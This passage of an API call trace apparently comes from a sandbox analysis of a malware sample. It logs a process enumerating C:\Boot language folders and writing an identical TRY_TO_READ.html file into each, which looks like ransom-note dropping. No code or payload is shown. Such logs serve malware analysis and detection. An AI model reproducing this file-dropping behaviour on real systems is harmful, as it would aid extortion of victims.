lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.243] CloseHandle (hObject=0x3dc) returned 1 [0065.244] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.244] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.244] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.244] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cbf8 | out: hHeap=0x410000) returned 1 [0065.244] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0065.244] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cbf8 [0065.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cc20 [0065.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cc48 [0065.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] GetLastError () returned 0x0 [0065.244] SetLastError (dwErrCode=0x0) [0065.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.244] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\TRY_TO_READ.html" (normalized: "c:\\boot\\en-us\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.245] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.245] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.246] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.246] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.246] CloseHandle (hObject=0x3dc) returned 1 [0065.246] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.246] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.246] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.246] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cc48 | out: hHeap=0x410000) returned 1 [0065.247] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0065.247] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.247] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cc48 [0065.247] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cc70 [0065.247] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cc98 [0065.247] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.247] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.247] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] GetLastError () returned 0x0 [0065.247] SetLastError (dwErrCode=0x0) [0065.247] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.247] CreateFileW (lpFileName="C:\\\\Boot\\es-ES\\TRY_TO_READ.html" (normalized: "c:\\boot\\es-es\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.248] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.249] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.249] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.249] CloseHandle (hObject=0x3dc) returned 1 [0065.249] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cc98 | out: hHeap=0x410000) returned 1 [0065.250] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0065.250] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.250] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cc98 [0065.250] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ccc0 [0065.250] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cce8 [0065.250] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.250] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.250] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] GetLastError () returned 0x0 [0065.250] SetLastError (dwErrCode=0x0) [0065.250] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.250] CreateFileW (lpFileName="C:\\\\Boot\\fi-FI\\TRY_TO_READ.html" (normalized: "c:\\boot\\fi-fi\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.251] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.251] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.251] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.252] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.252] CloseHandle (hObject=0x3dc) returned 1 [0065.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cce8 | out: hHeap=0x410000) returned 1 [0065.252] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0065.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.252] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.252] GetLastError () returned 0x0 [0065.252] SetLastError (dwErrCode=0x0) [0065.252] GetLastError () returned 0x0 [0065.252] SetLastError (dwErrCode=0x0) [0065.252] GetLastError () returned 0x0 [0065.252] SetLastError (dwErrCode=0x0) [0065.252] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cce8 [0065.252] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cd10 [0065.252] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cd38 [0065.252] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.252] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.252] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.252] GetLastError () returned 0x0 [0065.252] SetLastError (dwErrCode=0x0) [0065.252] GetLastError () returned 0x0 [0065.252] SetLastError (dwErrCode=0x0) [0065.253] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.253] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\TRY_TO_READ.html" (normalized: "c:\\boot\\fonts\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.254] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.254] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.255] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.255] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.255] CloseHandle (hObject=0x3dc) returned 1 [0065.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cd38 | out: hHeap=0x410000) returned 1 [0065.256] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0065.256] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.256] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.256] GetLastError () returned 0x0 [0065.256] SetLastError (dwErrCode=0x0) [0065.256] GetLastError () returned 0x0 [0065.256] SetLastError (dwErrCode=0x0) [0065.256] GetLastError () returned 0x0 [0065.256] SetLastError (dwErrCode=0x0) [0065.256] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cd38 [0065.256] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cd60 [0065.256] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cd88 [0065.256] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.256] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.256] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.256] GetLastError () returned 0x0 [0065.256] SetLastError (dwErrCode=0x0) [0065.256] GetLastError () returned 0x0 [0065.256] SetLastError (dwErrCode=0x0) [0065.256] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.256] CreateFileW (lpFileName="C:\\\\Boot\\fr-FR\\TRY_TO_READ.html" (normalized: "c:\\boot\\fr-fr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.257] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.257] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.258] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.258] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.259] CloseHandle (hObject=0x3dc) returned 1 [0065.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cd88 | out: hHeap=0x410000) returned 1 [0065.259] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0065.259] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.259] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.259] GetLastError () returned 0x0 [0065.259] SetLastError (dwErrCode=0x0) [0065.259] GetLastError () returned 0x0 [0065.259] SetLastError (dwErrCode=0x0) [0065.259] GetLastError () returned 0x0 [0065.259] SetLastError (dwErrCode=0x0) [0065.259] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cd88 [0065.259] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cdb0 [0065.259] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cdd8 [0065.259] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.259] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.259] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.259] GetLastError () returned 0x0 [0065.259] SetLastError (dwErrCode=0x0) [0065.259] GetLastError () returned 0x0 [0065.259] SetLastError (dwErrCode=0x0) [0065.259] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.259] CreateFileW (lpFileName="C:\\\\Boot\\hu-HU\\TRY_TO_READ.html" (normalized: "c:\\boot\\hu-hu\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.260] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.260] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.261] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.261] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.261] CloseHandle (hObject=0x3dc) returned 1 [0065.263] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.263] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.263] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.263] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cdd8 | out: hHeap=0x410000) returned 1 [0065.263] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0065.263] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.263] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cdd8 [0065.263] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ce00 [0065.263] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ce28 [0065.263] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.263] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.263] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] GetLastError () returned 0x0 [0065.263] SetLastError (dwErrCode=0x0) [0065.263] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.263] CreateFileW (lpFileName="C:\\\\Boot\\it-IT\\TRY_TO_READ.html" (normalized: "c:\\boot\\it-it\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.264] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.264] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.265] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.265] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.266] CloseHandle (hObject=0x3dc) returned 1 [0065.266] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.266] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.266] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.266] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ce28 | out: hHeap=0x410000) returned 1 [0065.266] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0065.266] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.266] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] GetLastError () returned 0x0 [0065.266] SetLastError (dwErrCode=0x0) [0065.266] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ce28 [0065.266] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ce50 [0065.266] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ce78 [0065.266] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.266] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.266] RtlAllocateHeap 